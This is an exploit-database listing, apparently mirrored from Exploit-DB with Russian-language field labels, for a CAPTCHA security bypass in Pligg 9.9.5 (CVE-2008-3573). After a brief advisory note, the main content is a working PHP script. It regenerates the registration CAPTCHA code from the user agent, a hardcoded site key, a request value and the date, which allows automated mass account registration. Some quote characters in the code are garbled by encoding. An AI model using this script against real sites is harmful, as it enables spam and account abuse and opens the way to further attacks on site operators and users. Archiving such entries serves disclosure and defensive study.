- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 32142
- Проверка EDB
-
- Пройдено
- Автор
- MICHEAL BROOKS
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-3573
- Дата публикации
- 2008-08-02
PHP:
source: https://www.securityfocus.com/bid/30518/info
Pligg is prone to a security-bypass weakness.
Successfully exploiting this issue will allow an attacker to register multiple new users through an automated process. This may lead to other attacks.
Pligg 9.9.5 is vulnerable; other versions may also be affected.
<?php
$sitekey=82397834;
$ts_random=$_REQUEST['ts_random'];
$datekey = date(�F j�);
$rcode = hexdec(md5($_SERVER['HTTP_USER_AGENT'] . $sitekey . $ts_random . $datekey));
print substr($rcode, 2, 6);
?>- Источник
- www.exploit-db.com
